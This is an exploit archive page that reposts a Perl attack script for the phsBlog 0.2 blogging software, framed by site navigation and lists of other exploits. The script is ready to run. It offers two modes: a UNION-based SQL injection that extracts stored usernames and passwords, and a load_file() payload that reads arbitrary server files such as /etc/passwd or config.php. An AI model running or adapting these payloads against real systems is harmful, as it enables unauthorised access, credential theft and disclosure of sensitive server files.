首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 phsBlog 0.2 Bypass SQL Injection Filtering Exploit 来源：irancrash [ a t ] gmail [ d o t] com 作者：irancrash 发布时间：2008-09-12   #!/usr/bin/perl #---------------------------------------------------------------- # #Script : PhsBlog v0.2 # #Type : Bypass Sql injection Filtering Exploit # #Method : GET # #Risk : High # #---------------------------------------------------------------- # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # #---------------------------------------------------------------- # #Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR # #---------------------------------------------------------------- # #Script Download :  http://www.phsdev.com/downloads/phsblog_current.zip # #---------------------------------------------------------------- # #                        Tnx : God # #                     HTTP://IRCRASH.COM # #---------------------------------------------------------------- use LWP; use HTTP::Request; use Getopt::Long; $scriptname="PhsBlog v0.2"; sub header { print " **************************************************** * $scriptname **************************************************** *Discovered by : Khashayar Fereidani               * *Exploited by : Khashayar Fereidani                * *My Official Website : http://fereidani.ir         * ****************************************************"; } sub usage {   print " * Usage : perl $0 http://Example/ **************************************************** "; }                                                                                  $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url."/";} if($url !~ /http:\/\//){$url = "http://".$url;} sub xpl1() { #concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) $vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*"; $requestpage = $url.$vul; my $req  = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req->referer($url); $req->referer("IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/<endpass>/,$password); $password = @password[0]; if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; } print "\n Username: ".$name."\n\n"; print " Password: " .$password."\n\n"; } #XPL2 sub xpl2() { print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; print "\n Enter File Address :"; $fil3 = <stdin>; #index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/* $vul = "?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*"; $requestpage = $url.$vul; my $req  = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req->referer($url); $req->referer("IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0]; if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; } open (FILE, ">".source.".txt"); print FILE $name; close (FILE); print " File Save In source.txt\n"; print ""; } #XPL2 END #Starting; print " **************************************************** * $scriptname **************************************************** *Discovered by : Khashayar Fereidani               * *Exploited by : Khashayar Fereidani                * *My Official Website : http://fereidani.ir         * **************************************************** * Mod Options :                                    * * Mod 1 : Find Script username and password        * * Mod 2 : File Disclosure(not work in many servers)* ****************************************************"; print "\n \n Enter Mod : "; $mod=<stdin>; if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; if ($mod=="1") { xpl1(); }; if ($mod=="2") { xpl2(); };   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Easy Photo Gallery 2.1 XSS/FD/ ·minb 0.1.0 Remote Code Executi ·Adobe Acrobat 9 ActiveX Remote ·Maxthon Browser 2.1.4.443 UNIC ·Yourownbux 4.0 (COOKIE) Authen ·pLink 2.07 (linkto.php id) Rem ·Wordpress 2.6.1 (SQL Column Tr ·Sports Clubs Web Panel 0.0.1 R ·Peachtree Accounting 2004 (PAW ·Windows Media Encoder wmex.dll ·The Personal FTP Server 6.0f R ·CzarNews <= 1.20 (Cookie) Remo   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved